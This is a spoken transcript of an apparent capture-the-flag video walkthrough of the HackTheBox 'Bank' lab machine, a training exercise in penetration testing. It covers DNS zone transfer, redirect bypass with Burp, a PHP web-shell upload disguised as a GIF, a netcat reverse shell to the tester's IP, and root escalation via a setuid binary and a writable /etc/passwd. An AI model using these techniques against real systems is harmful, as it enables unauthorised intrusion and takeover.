Hey guys, what's going on? This is IppSec, and we'll be doing the bank machine from HackTheBox. This box got a little bit of hate because there's some guesswork involved to get the initial web page. But once you do that, there's almost two ways to do every other step, which is awesome. One way that was intended, the other way that is unintended. Turns out writing software is hard, and then writing software that's intentionally vulnerable is even harder. So we're going to be jumping right into this box. So you know the drill. We're going to nmap the box with save scripts, enumerate versions, output all formats, and then the IP address of bank, which is 10.10.10.29. I've already ran this, so let's just look at the results. We do see it listening on 3 ports, 22 SSH, 53 DNS. This is odd. Normally DNS is only UDP. It uses TCP in cases when the response is greater than 512 bytes, I believe. And that happens normally in DNS zone transfers, which are normally disabled, and rare cases DNSSEC or IPv6. But most time when you see DNS on 53 TCP and not just UDP, zone transfers may be enabled, so that is something to look into. Then you of course have Apache listening on port 80. So let's begin by poking at the DNS. I'm going to open up NSLOOKUP, type server 10.10.10.29 to change it to the bank's DNS port, I guess. And we're going to just test a few things. I normally test like 127.0.0.1 to see what it responds with. Maybe you'll get lucky and it says a host name there exposes something. Next thing is the IP address of the server, so 10.10.10.29. Reverse lookups are not enabled, so we don't get a result there. We think the name may be bank.htb because that's what HackTheBox's portal says, so we're going to try that. And we do see it respond. A few other things I may try running is DNS recon. So I'm going to do DNS recon -range or -r 127.0.0.0/24. What that's going to do is take this octet and just go 1 to 255. If it was /16, this one and this one would go 1 to 255, and then /8, all 3 of these. A little bit of networking there. And then we have to specify the name server, so 10.10.10.29. And we see no extra responses. I could flip this to a 1 because a lot of host files also include like 127.0.1.1 and don't get anything. The last thing, let's see what else is on that 10 subnet. And we get nothing. So let us try a DNS zone transfer. So we're going to do dig axfr. This is the flags to do a zone transfer. And then at 10.10.10.29, the DNS server. Get a response, but nothing. So zone transfers are not enabled for the root zone. The next thing, let's specify bank.htb as the zone, and we get the zone transfer being successful. The only thing this really tells us is we have a few extra name servers or subdomains. We have chris.bank.htb, ns.bank.htb, and www.bank.htb. So few extra domain names. We're going to add those to our host file. Actually, we have DNS, so why don't we just add them to resolve.conf and specify we want to use bank as our DNS server. So 10.10.10.29, and then I can ping bank.htb now. Awesome. So that's it for the DNS portion, and now we'll be digging into the web. Let's open up Firefox and go to 10.10.10.29. We get the Apache default index page. We see right here Apache 2 Ubuntu default. And if we went to bank.htb, we get something completely different. So if you're not familiar with VirtualHost routing, we'll show you how it works real quick. Let's just send this request into burp. Then I'm going to press Ctrl-R to send this to repeater. When I click go, we send this request, we get the Apache 2 Ubuntu default page. VirtualHost routing works by this host header, so I'm going to change this to bank.htb and then send go. We get something completely different, a HTTP redirect, which is odd to see when you also see a bunch of source down here. This is a vulnerability in and itself, and we'll go into this in just a little bit, but virtual host routing, Apache just examines this host field and then, based upon the value, sends you to a different web page. So that's how that all works. The first thing I would be doing is testing a bunch of SQL injection here. This isn't vulnerable, I don't believe, so I'm just going to skip that. You should look at other videos to see how SQL map works and just some things I do to test it. So we don't have login. The next step would be to run a DirBuster. We've already shown you DirBuster. I didn't like DirBuster because I went back in the video I had used it and verified that recursive wasn't checked, and for some reason it still did recursive. So I was trying to use GoBuster, which is like DirBuster written in Go, but it doesn't do one thing that I need for this video. So we're going to be using DirSearch. So cd/opt DirSearch. I just ran a git clone. If you just Google DirSearch Python, and you'll come to the git page and then just download it. So we do Python DirSearch.py, and we see it requires Python 3. So we're going to specify Python 3. And then URL target is missing, so let's just do a -h to get all the flags. So what we want to do is we'll specify a URL, so -u we want. We're going to want to specify extensions with -e because we know this is a PHP page. So we're going to take a word list, and then it's going to search the word list to try to get directories, and then it's going to take every entry in that word list, append.php, to try to get files. So we definitely want that -e. -w, the word list. -f, force extensions. So force extensions for every word list entry, like in DirBuster. We're going to want that. Recursive, we don't want that. This is why we're not actually using DirBuster, because this makes it take forever. Threads, we can use some threads. Header, if we wanted to put a referral or user agent. We don't have to specify the host header because it automatically does that when we specify bank.htb in the URL. So let's run this. It was Python 3, DirSearch, word list, so user share word list DirBuster, and it's not letting me show you all the files in this directory. So copy this. So I normally run this directory list to -3-medium. This will take forever, so I took the entries I wanted and then created some fake entries and put them in bankvid. So you won't have that directory, but that's what I'm going to be using because I want to go fast. So -w, user, damn it, copied it. User share word list DirBuster bank-vid. And then what else do we want? We want extensions for PHP. We want force extensions. We want to do, let's say, 20 threads. And the -u for URL. And I think that's what we want. So running this. And we see it doing a bunch of requests and the output here. So we have a balance transfer directory. These 300 requests, and we already saw what that is, but it's odd to see 7 kilobytes. It should just be bytes because it should just redirect you, and that's it. Shouldn't have anything below that redirect. We also see the same thing for support.php. So balance transfer was the intended way to get the machine, so we're going to do that way first, and then I'll show you these abusing. Actually, no, we're going to reverse that. We're going to start here, show you what you could do, and then balance transfer, because this will log you into the web application legitimately. So if we go back to a burp, and what we want to do is tell a browser that this isn't 302 found, this is 200 OK, because when a browser sees this, it's going to forward us to the redirect, which would be login.php. And where is that? It should have a location. Oh, yeah. There's the location. I just can't read. So the browser sees 302 found. pulls location, and then goes to it. So we can verify that behavior by just going burp. Let's turn intercept off, or intercept on, and we're going to intercept server responses. So refresh this. Intercept, so we're going to get login. So, wait. No, I wanted to get index. Index.php. Let's do that. So we get index. We get this 302 found. Then a browser goes, yep, I'm going to follow that request, get login. And then we get the login page. So what would have happened if we do index.php? I turned intercept off out of habit. So we're going to get this index. And instead of the server telling us 302 found, what if it just said 200 OK? So a browser did not go to this location header. We get some 404s, but completely different. So what we can do in burp is just automatically rewrite all the responses. So we're going to go down to match and replace. And I'm going to say on the, let's see, it should be response header. Yeah, response header right there. We're going to match 301 or 2. And what was the other piece of that header? Hold on. 302 found. So, response header 301 or 2 found. And we're going to replace it with 200 OK. And we'll give the comment of ignore redirect. I'm not sure if this is all caps or if it matters. But we're going to enable regular expressions because this is regular expression to do the 1 or 2. Click OK. And now let's just go to index.php and see if it redirects us. It does not. So now we can also do support.php and get to this page. So that is the unintended way to get to support.php. Once you do this, this is how you upload a shell. We'll be doing that shortly, but I want to show you the intended way next. So let's go back to DirSearch. We have this balance transfer directory, so let's just go there. And before we do anything, let's disable a rewrite because we don't need this anymore. So let's go to, not bookmarks, balance transfer. And we get a bunch of files. If we try to click one of these files, we just get OK, encrypt, success, and a bunch of information. If we try to base64 decode this, it doesn't work. It's encrypted, so that's a dead end. If you scroll around, you'll see one of these is not 580 some bytes. It is like 200. So the easiest way to do this is we're going to copy this. Let's go back to our HackTheBox folder, and we're going to do a wget recursive and then the URL. And what this is going to do is download everything we just saw right here. The other way to do this, if you have burp pro, is go into target. Let's go down to balance transfer. Add this to scope. And we're adding the balance transfer folder. We're going to spider the balance transfer folder. And we'll see all these go from gray to black, which means we have a response. And then we can click on this filter and then say encrypt, success, and negative search. So don't show us anything that has a response of encrypt success. Okay, I guess it's filtering, hopefully. Yeah. So it's now removing all those. And while that's doing that, we can see if a wget finished. They haven't. So right now, we're just waiting for either wget to finish or burp to finish filtering. Because one of these requests does not have encrypt success. So, fortunately, there's a lot of requests. Like, a lot. So, it could take a little bit. Let's just go back here. And I'm going to cheat. I think it's 280 something. Is it 284? No. It's the size we have to look at. One of these files is not 500 bytes, it's 200. And the reasoning is the encryption just made it a bit bigger. So, come on. Come on. Where is it? It's like finding a needle in a haystack. Well, hopefully something finished. Let's see. Wget's finished. So, if we go into the folder it created, bank.html, balance transfer, we have all the files. Let's get rid of these index.htmls because they don't matter. And we can just do a word count and specify -c for characters on all these files. And we see that 580, so let's just sort numbers. And now we sorted it by file size. And then we'll add the flag for reverse, and we get 257 here. And I changed the size of this window. That's annoying. And lastly, this file gives us an email address and password. So, did burp finish? It did as well. So, let's disable this. And we'll begin by logging in. So, email chris@bank.htb. And the password is HTTP bank password. Log in, and we get to the dashboard. Finally. So the next thing to do would be just, I guess, click around. If we go to support, we get the support portal. And let's just delete these files. I forgot to revert this machine, but... So, let's just try uploading something. So, test, choose file. I want to go to other locations. Opt shell, I think? Yeah, I have all my shells in opt shell, and we'll do PHP. I'm just going to do this corner.gif so it sets my metadata and all that to be an image because images are generally accepted. So, turn intercept on, submit, and I'm going to get rid of this, and I'm going to leave that GIF 89. And the reason I do that, just like the popcorn video, if we create a file, and we have GIF 8 at the top, and then specify anything, we do a file against that, and the magic byte says it's an image. So if it's using magic bytes to test if we're uploading an image, having that GIF 8 as the first few bytes will fix that. So I leave that in. I'm going to do PHP echo system request IPsec. So our basic PHP web shell, just running commands one at a time. Send this over to repeater, and we'll change add .php there. So for this request off, we don't need to intercept responses anymore, so let's undo that. And we get, oh, you can only upload images. So that's odd. Going to repeater, let's see exactly what happened. We had, or let's just upload corners.gif to see if it was that .php we appended that caused an error. Does render work? So we do see it uploaded it when we didn't have that PHP. But when we were scrolling through this, we saw an HTTP comment, debug. I added the file extension .htb to execute as PHP for debugging purposes only. So instead of .gif, let's do .htb. Upload, render, and we see another file uploaded. Awesome. So verify we're not intercepting. Go here, refresh the page. I'll just do that. And we see the two files. Going over these attachments, we can see that corners.htb has been uploaded. And if we add the ipsec command that we coded, we do have code execution. So the next step would be to do a reverse shell. So we can do like a which nc. We do see nc is, so nc's netcat. Let's just try netcat/bin/sh, and we'll specify lvn if config clvnp 8081. My IP address 10.10.14.41. That's what I wanted. And we get a shell. So we're going to do the python-c import pty.spawn /bin/bash. Actually, before I do that, I can prove I have a shell. If we just do who am I www data. So it's just not giving us the prompt. So now I can run py.spawn bin bash. Okay. Now I'm going to background this with Control-Z, stty raw -echo, and then type fg, enter. And I have a full shell with like tab auto completion, which makes life easy. Term environment not set. So let's set term. Echo term screen. Export term equal screen. And now I can clear too. Awesome. So now for Privesc. The first thing I do is I wanted to see if I can figure out how that encrypt function worked. So I'm going to grep recursively, which will grep all these files in here for encrypt because it put that in those files. If I do dot, and I'm going to do a grep-v to exclude the balance transfer. There's probably a more elegant way to do this, but this is the quick way. And I don't see this in any of the PHP files, so I'm guessing something else encrypts it, not the PHP files. No idea what does. Never found it, but I guess that's one of the reasons people don't like this machine, because that encryption is kind of a rabbit hole. There's a lot of files to go through. So that's a dead end. We stop looking at that. The next thing, I poke around these PHP files, and we see the user.php. It would have meant if I just cat that. And these are the credentials to MySQL. So I would first MySQL-u root, log into MySQL, and then oh my god, I'm drawing a blank on how to drop to a shell. That's it. Do that, drop to a shell. We don't see us escalating to root. Sometimes you'll get lucky, and when you execute the shell from MySQL, it's configured to just allow you to be the user that's running MySQL, and sometimes MySQL is running as root. Very quick check. Just do that. The next thing is I'll try to SSH to bank.htb as root. And we'll use that password I had copied back here, that secure password. And we get permission denied. So that's not root's password. We're going to cat etc passwd, and we see, let's see, what is the user? Chris. So we'll just try that for Chris, to see if we get out of this www user. And we don't. So we don't have Chris's or root's password. The next thing, of course, would be just to do the enumeration scripts. So I'm going to press Control A and then double quote to split that horizontally, and we're going to run Python HTTP server. So /opt Linux, and we have a few enumeration scripts. If you just Google these, you can pull them. You should be familiar with all of them. So Python-m, simple HTTP server, and then we're just going to wget on my IP. So 10.10.14 41 8000, and we're going to specify that -r flag again. And we see it downloaded all the files, so we can stop this simple HTTP server and go into this. So we have linenum, Linux priv check, and Unix priv check. So the first one I'm going to run is linenum. Oh man, that just went slow. And we'll see what this gives us as output. We actually saw someone SSH as Chris. I guess someone got his password. So let's go to the top. I guess, hold on. While we go through this, let's... never mind. I was going to open up another session and run a different script, but this Unix priv check should be all we need. So, going to the top. Okay. Kernel information, 2017. Kernel's been updated, so it's not vulnerable to things like dirty cow, so don't even have to go there. We're running Ubuntu 14. SSH from Chris and root. I don't even know where Chris's password is. That's odd. But it's on a 192 subnet, so it doesn't look like it's a player. So it's searching for potential users on the box in etc passwd. We already saw this. Root and Chris. Home directory permissions. Let's see, cron jobs. I don't see any crons that don't look normal, and I don't have write access to any of them. More cron stuff, IP stuff. Looking at listening sockets. So MySQL. I don't see any services that look like we can abuse just listening on localhost. UDP, that's DNS 53. Running processes. Service permissions. It's going through Apache directory. We already looked at this. So many encrypted files. Okay, so that's the end of the Apache. Useful files, Nmap on this box, awesome, netcat, wget, gcc. Configuration files. Oh, missed this. Can we read or write sensitive files? We have write access to etc passwd. So this is a good one, and I think an unintended Privesc. So keep that one in mind. And it doesn't look like that found set UID. Weird. So we're going to run find slash, I think, dash perm 4000. This is going to look for files that have the set UID bit set. If we do lin.privchecker.py, it'll also run this, but it takes a while. So let's just see if we can speed it up by running this manually and hope I did this correctly. Yes. So we do see the vir HTTP bin emergency. So let's see who owns this. So we could have just done like, I think, dash exec l. Whoa. That's weird. Let's copy this and clear. Something happened with my terminal window. Okay, let's just do ls-la. My command was too long and it freaked out. So we see sticky is set and root owns this. So if we just execute this to see what happens, it just drops us to a shell immediately and we become root, effective user ID. And then if we just do ls/root, we're in. The other way would be we can just edit this passwd file. So if we do open SSL passwd --help, we can see the algorithms. And what this is doing is I want to create a encrypted password and I'm going to put that in the passwd file. So if we just do password as IPsec, it gives us the standard Unix password algorithm encrypted. If we had done the -1 flag to specify MD5, you may be more familiar with that format. But since it says we have write access to passwd, let's try writing. So change that, put the password where it should be, and then we try writing. It cannot create backup file. So it says add exclamation point to override. And then if we su to root and type IPsec, we get in. And we could have also just ssh bank.htb, IPsec, and log in. So when passwd is word writable, just write a password and log in. And yeah. Hope you enjoyed the video. Take care,